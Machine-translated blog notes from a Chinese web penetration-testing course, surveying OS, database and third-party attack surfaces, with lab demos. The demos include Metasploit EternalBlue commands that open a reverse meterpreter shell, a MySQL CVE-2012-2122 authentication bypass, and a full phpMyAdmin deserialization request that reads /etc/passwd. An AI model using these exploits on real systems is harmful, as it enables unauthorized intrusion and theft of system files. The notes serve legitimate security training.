current position:Home>Day05 basic introduction - system and database, etc

Day05 basic introduction - system and database, etc

2022-01-26 21:57:47 Wind feather writer

Day05 Basic introduction - System and database, etc

Statement : This article is just a personal study note , For communication and learning only , Do not use for illegal purposes

—— Xiaodi web Safety penetration training video notes

Preface

Remove the middleware to build the platform , Outside the website source code , The operating system is also vulnerable , database , Third party software platform, etc , Such attacks can also directly affect Web Or server security , Result in the acquisition of website or server permissions .

Content

At the operating system level

Common ways to identify operating systems

Identify by website or by scanning relevant software

1. adopt url Determine the server system by changing the case of

Case has no effect on Web pages , This situation can be regarded as windows The server , because windows The server is not case sensitive

Case change will report an error , The corresponding operating system of this website is linux The server

2. It can also be used. TTL To determine the server system , Adjacent values to judge

3. You can use nmap To determine the operating system

nmap -O IP

Briefly describe the difference between the two and the significance of identification

Website path 、 Case write 、 Applicability of documents between the two systems , Compatibility

The corresponding meaning of vulnerability types at the operating system level

Some vulnerabilities do little harm , Some vulnerabilities can lead to the loss of server permissions .

Different types of vulnerabilities will create conditions for exploiting this vulnerability

Briefly describe the impact scope of vulnerabilities at the operating system level

Exploit vulnerabilities to gain privileges or interfere with certain services

Database level

Common methods for identifying database types

Identify the database through the website , Database connected through script

ASP+Access(windows) port : nothing
PHP+Mysql port :3306
ASPX+Mssql(windows) port :1433
Jsp+Mssql,oracle port :1521
Python+Mongodb port :27017

Port scanning

The difference of database type and its recognition significance

The security mechanism in each database , The writing method and structure are slightly different , Similarly, the loopholes are different .

Common database vulnerability types and attacks

Weak password

Briefly describe the scope of vulnerability impact at the database level

Get the website administrator data and log in to the background , Get user data and log in user information , Make changes , Vulnerability can be exploited through database operation , You can also obtain database permissions and website permissions .

Third party level

How to determine which third-party platforms or software

Multi level judgment , Not limited to port scanning , Take different methods according to different applications .

Briefly why you need to identify third-party platforms or software

Common third-party platform or software vulnerability types and attacks
Briefly describe the scope of third-party platform or software security testing

Add

Remove routine WEB Safety and APP Outside the safety test , Other services similar to single or complex servers ( mail 、 game 、 Load balancing, etc. ) It can also be used as a security test target , Such goal testing principles are only missing WEB Application or other security issues . Therefore, it is very important to clarify the idea of safety testing !

Case presentation

  • Demonstration of the basic knowledge involved above
  • An operating system level vulnerability demonstration
  • Weak password and vulnerability demonstration of a database
  • A third-party application security vulnerability

The following cases do not need to master the exploitation of vulnerabilities , Just understand the loopholes at all levels

Case study 1: Demonstration of the basic knowledge involved above

See in detail Content part

Case study 2: An operating system level vulnerability demonstration

This experiment was carried out on a target plane , Do not use in unauthorized real environments , Otherwise, we will be responsible for the consequences .

Environment configuration

Drone aircraft

win2008R2 x64
IP:192.168.3.31

445 Port open

attack

kali

IP:192.168.3.222

operation

open msf

msfconsole	#  open msf

use exploit/multi/handle

use exploit/windows/smb/ms17_010_eternalblue	

set payload windows/x64/meterpreter/reverse_tcp		#  Set up payload

View configuration parameters

msf5> show options 

Set parameters

set lhost 192.168.3.222		#  Set the local address ( That is, the of the attacker IP)

set rhost 192.168.3.31		#  Set the destination address 

run

Get access to

meterpreter > shell

meterpreter > ipconfig

You can see ipconfig Print out the command, target IP:192.168.3.31

Case study 3: Weak password and vulnerability demonstration of a database

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

Environment configuration

Drone aircraft

Ubuntu + vulhub Range environment

IP:192.168.131.135

attack

kali

operation

Open the range environment (mysql Vulnerability environment )

cd vulhub Shooting range project directory 

cd mysql/CVE-2012-2122/

docker-compose up -d

The attack

nmap Scan port

Discovery port 3306 to open up , Corresponding mysql Database services

lookup mysql Database vulnerability , accord with CVE-2012-2122 Mysql Identity authentication bypasses vulnerabilities

utilize msf Conduct vulnerability testing

success

Case study 4: Demonstration of security vulnerabilities in a third-party application

https://vulhub.org/#/environments/phpmyadmin/WooYun-2016-199433/

Environment configuration

shooting range

Ubuntu + vulhub Range environment

IP:192.168.56.130

attack

win10 Local physical machine

operation

Open the vulnerability environment

visit http://your-ip:8080, You will see phpmyadmin Home page . Because there is no connection to the database , We'll get a mistake . But this vulnerability has nothing to do with the database , So ignore .

Burpsuite Contract awarding

Send the following package /etc/passwd:

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

Remember to your-ip Changed to target IP

result

Resources involved

https://nmap.org/ # nmap

https://www.kali.org/ # kali Official website

https://vulhub.org/ # vulhub

https://github.com/hellogoldsnakeman/masnmapscan-V1.0 # masnmapscan Port scanner

copyright notice
author[Wind feather writer],Please bring the original link to reprint, thank you.
https://en.cdmana.com/2022/01/202201262157444894.html

Random recommended